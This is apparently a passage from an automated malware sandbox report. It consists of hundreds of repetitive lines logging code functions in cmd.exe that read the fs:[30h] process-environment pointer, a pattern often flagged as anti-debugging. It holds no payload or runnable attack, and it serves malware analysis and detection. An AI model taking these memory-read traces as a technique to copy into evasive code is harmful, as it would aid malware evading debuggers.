        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D8324 mov eax, dword ptr fs:[00000030h]12_2_031D8324
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318035C mov eax, dword ptr fs:[00000030h]12_2_0318035C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318035C mov eax, dword ptr fs:[00000030h]12_2_0318035C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318035C mov eax, dword ptr fs:[00000030h]12_2_0318035C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318035C mov ecx, dword ptr fs:[00000030h]12_2_0318035C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318035C mov eax, dword ptr fs:[00000030h]12_2_0318035C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318035C mov eax, dword ptr fs:[00000030h]12_2_0318035C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A8350 mov ecx, dword ptr fs:[00000030h]12_2_031A8350
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CA352 mov eax, dword ptr fs:[00000030h]12_2_031CA352
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]12_2_03182349
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D634F mov eax, dword ptr fs:[00000030h]12_2_031D634F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A437C mov eax, dword ptr fs:[00000030h]12_2_031A437C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE388 mov eax, dword ptr fs:[00000030h]12_2_030FE388
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE388 mov eax, dword ptr fs:[00000030h]12_2_030FE388
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE388 mov eax, dword ptr fs:[00000030h]12_2_030FE388
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8397 mov eax, dword ptr fs:[00000030h]12_2_030F8397
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8397 mov eax, dword ptr fs:[00000030h]12_2_030F8397
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8397 mov eax, dword ptr fs:[00000030h]12_2_030F8397
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312438F mov eax, dword ptr fs:[00000030h]12_2_0312438F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312438F mov eax, dword ptr fs:[00000030h]12_2_0312438F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE3DB mov eax, dword ptr fs:[00000030h]12_2_031AE3DB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE3DB mov eax, dword ptr fs:[00000030h]12_2_031AE3DB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE3DB mov ecx, dword ptr fs:[00000030h]12_2_031AE3DB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE3DB mov eax, dword ptr fs:[00000030h]12_2_031AE3DB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A43D4 mov eax, dword ptr fs:[00000030h]12_2_031A43D4
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A43D4 mov eax, dword ptr fs:[00000030h]12_2_031A43D4
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h]12_2_0310A3C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h]12_2_0310A3C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h]12_2_0310A3C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h]12_2_0310A3C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h]12_2_0310A3C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h]12_2_0310A3C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h]12_2_031083C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h]12_2_031083C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h]12_2_031083C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h]12_2_031083C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BC3CD mov eax, dword ptr fs:[00000030h]12_2_031BC3CD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031863C0 mov eax, dword ptr fs:[00000030h]12_2_031863C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E3F0 mov eax, dword ptr fs:[00000030h]12_2_0311E3F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E3F0 mov eax, dword ptr fs:[00000030h]12_2_0311E3F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E3F0 mov eax, dword ptr fs:[00000030h]12_2_0311E3F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031363FF mov eax, dword ptr fs:[00000030h]12_2_031363FF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]12_2_031103E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F823B mov eax, dword ptr fs:[00000030h]12_2_030F823B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D625D mov eax, dword ptr fs:[00000030h]12_2_031D625D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106259 mov eax, dword ptr fs:[00000030h]12_2_03106259
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BA250 mov eax, dword ptr fs:[00000030h]12_2_031BA250
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BA250 mov eax, dword ptr fs:[00000030h]12_2_031BA250
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03188243 mov eax, dword ptr fs:[00000030h]12_2_03188243
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03188243 mov ecx, dword ptr fs:[00000030h]12_2_03188243
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FA250 mov eax, dword ptr fs:[00000030h]12_2_030FA250
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F826B mov eax, dword ptr fs:[00000030h]12_2_030F826B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104260 mov eax, dword ptr fs:[00000030h]12_2_03104260
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104260 mov eax, dword ptr fs:[00000030h]12_2_03104260
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104260 mov eax, dword ptr fs:[00000030h]12_2_03104260
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E284 mov eax, dword ptr fs:[00000030h]12_2_0313E284
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E284 mov eax, dword ptr fs:[00000030h]12_2_0313E284
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03180283 mov eax, dword ptr fs:[00000030h]12_2_03180283
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03180283 mov eax, dword ptr fs:[00000030h]12_2_03180283
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03180283 mov eax, dword ptr fs:[00000030h]12_2_03180283
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031102A0 mov eax, dword ptr fs:[00000030h]12_2_031102A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031102A0 mov eax, dword ptr fs:[00000030h]12_2_031102A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h]12_2_031962A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031962A0 mov ecx, dword ptr fs:[00000030h]12_2_031962A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h]12_2_031962A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h]12_2_031962A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h]12_2_031962A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h]12_2_031962A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D62D6 mov eax, dword ptr fs:[00000030h]12_2_031D62D6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h]12_2_0310A2C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h]12_2_0310A2C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h]12_2_0310A2C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h]12_2_0310A2C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h]12_2_0310A2C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031102E1 mov eax, dword ptr fs:[00000030h]12_2_031102E1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031102E1 mov eax, dword ptr fs:[00000030h]12_2_031102E1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031102E1 mov eax, dword ptr fs:[00000030h]12_2_031102E1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AA118 mov ecx, dword ptr fs:[00000030h]12_2_031AA118
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AA118 mov eax, dword ptr fs:[00000030h]12_2_031AA118
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AA118 mov eax, dword ptr fs:[00000030h]12_2_031AA118
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AA118 mov eax, dword ptr fs:[00000030h]12_2_031AA118
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C0115 mov eax, dword ptr fs:[00000030h]12_2_031C0115
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h]12_2_031AE10E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03130124 mov eax, dword ptr fs:[00000030h]12_2_03130124
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03198158 mov eax, dword ptr fs:[00000030h]12_2_03198158
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106154 mov eax, dword ptr fs:[00000030h]12_2_03106154
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106154 mov eax, dword ptr fs:[00000030h]12_2_03106154
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FC156 mov eax, dword ptr fs:[00000030h]12_2_030FC156
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03194144 mov eax, dword ptr fs:[00000030h]12_2_03194144
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03194144 mov eax, dword ptr fs:[00000030h]12_2_03194144
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03194144 mov ecx, dword ptr fs:[00000030h]12_2_03194144
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03194144 mov eax, dword ptr fs:[00000030h]12_2_03194144
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03194144 mov eax, dword ptr fs:[00000030h]12_2_03194144
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4164 mov eax, dword ptr fs:[00000030h]12_2_031D4164
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4164 mov eax, dword ptr fs:[00000030h]12_2_031D4164
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318019F mov eax, dword ptr fs:[00000030h]12_2_0318019F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318019F mov eax, dword ptr fs:[00000030h]12_2_0318019F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318019F mov eax, dword ptr fs:[00000030h]12_2_0318019F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318019F mov eax, dword ptr fs:[00000030h]12_2_0318019F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03140185 mov eax, dword ptr fs:[00000030h]12_2_03140185
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BC188 mov eax, dword ptr fs:[00000030h]12_2_031BC188
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BC188 mov eax, dword ptr fs:[00000030h]12_2_031BC188
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FA197 mov eax, dword ptr fs:[00000030h]12_2_030FA197
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FA197 mov eax, dword ptr fs:[00000030h]12_2_030FA197
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FA197 mov eax, dword ptr fs:[00000030h]12_2_030FA197
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A4180 mov eax, dword ptr fs:[00000030h]12_2_031A4180
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A4180 mov eax, dword ptr fs:[00000030h]12_2_031A4180
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h]12_2_0317E1D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h]12_2_0317E1D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E1D0 mov ecx, dword ptr fs:[00000030h]12_2_0317E1D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h]12_2_0317E1D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h]12_2_0317E1D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C61C3 mov eax, dword ptr fs:[00000030h]12_2_031C61C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C61C3 mov eax, dword ptr fs:[00000030h]12_2_031C61C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031301F8 mov eax, dword ptr fs:[00000030h]12_2_031301F8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D61E5 mov eax, dword ptr fs:[00000030h]12_2_031D61E5
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h]12_2_0311E016
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h]12_2_0311E016
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h]12_2_0311E016
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h]12_2_0311E016
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03184000 mov ecx, dword ptr fs:[00000030h]12_2_03184000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196030 mov eax, dword ptr fs:[00000030h]12_2_03196030
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FA020 mov eax, dword ptr fs:[00000030h]12_2_030FA020
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FC020 mov eax, dword ptr fs:[00000030h]12_2_030FC020
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03102050 mov eax, dword ptr fs:[00000030h]12_2_03102050
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186050 mov eax, dword ptr fs:[00000030h]12_2_03186050
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312C073 mov eax, dword ptr fs:[00000030h]12_2_0312C073
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310208A mov eax, dword ptr fs:[00000030h]12_2_0310208A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C60B8 mov eax, dword ptr fs:[00000030h]12_2_031C60B8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C60B8 mov ecx, dword ptr fs:[00000030h]12_2_031C60B8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F80A0 mov eax, dword ptr fs:[00000030h]12_2_030F80A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031980A8 mov eax, dword ptr fs:[00000030h]12_2_031980A8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031820DE mov eax, dword ptr fs:[00000030h]12_2_031820DE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031420F0 mov ecx, dword ptr fs:[00000030h]12_2_031420F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FA0E3 mov ecx, dword ptr fs:[00000030h]12_2_030FA0E3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031860E0 mov eax, dword ptr fs:[00000030h]12_2_031860E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031080E9 mov eax, dword ptr fs:[00000030h]12_2_031080E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FC0F0 mov eax, dword ptr fs:[00000030h]12_2_030FC0F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100710 mov eax, dword ptr fs:[00000030h]12_2_03100710
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03130710 mov eax, dword ptr fs:[00000030h]12_2_03130710
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C700 mov eax, dword ptr fs:[00000030h]12_2_0313C700
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317C730 mov eax, dword ptr fs:[00000030h]12_2_0317C730
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313273C mov eax, dword ptr fs:[00000030h]12_2_0313273C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313273C mov ecx, dword ptr fs:[00000030h]12_2_0313273C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313273C mov eax, dword ptr fs:[00000030h]12_2_0313273C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C720 mov eax, dword ptr fs:[00000030h]12_2_0313C720
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C720 mov eax, dword ptr fs:[00000030h]12_2_0313C720
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100750 mov eax, dword ptr fs:[00000030h]12_2_03100750
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142750 mov eax, dword ptr fs:[00000030h]12_2_03142750
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142750 mov eax, dword ptr fs:[00000030h]12_2_03142750
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318E75D mov eax, dword ptr fs:[00000030h]12_2_0318E75D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03184755 mov eax, dword ptr fs:[00000030h]12_2_03184755
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313674D mov esi, dword ptr fs:[00000030h]12_2_0313674D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313674D mov eax, dword ptr fs:[00000030h]12_2_0313674D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313674D mov eax, dword ptr fs:[00000030h]12_2_0313674D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108770 mov eax, dword ptr fs:[00000030h]12_2_03108770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A678E mov eax, dword ptr fs:[00000030h]12_2_031A678E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B47A0 mov eax, dword ptr fs:[00000030h]12_2_031B47A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031007AF mov eax, dword ptr fs:[00000030h]12_2_031007AF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310C7C0 mov eax, dword ptr fs:[00000030h]12_2_0310C7C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031807C3 mov eax, dword ptr fs:[00000030h]12_2_031807C3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031047FB mov eax, dword ptr fs:[00000030h]12_2_031047FB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031047FB mov eax, dword ptr fs:[00000030h]12_2_031047FB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318E7E1 mov eax, dword ptr fs:[00000030h]12_2_0318E7E1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031227ED mov eax, dword ptr fs:[00000030h]12_2_031227ED
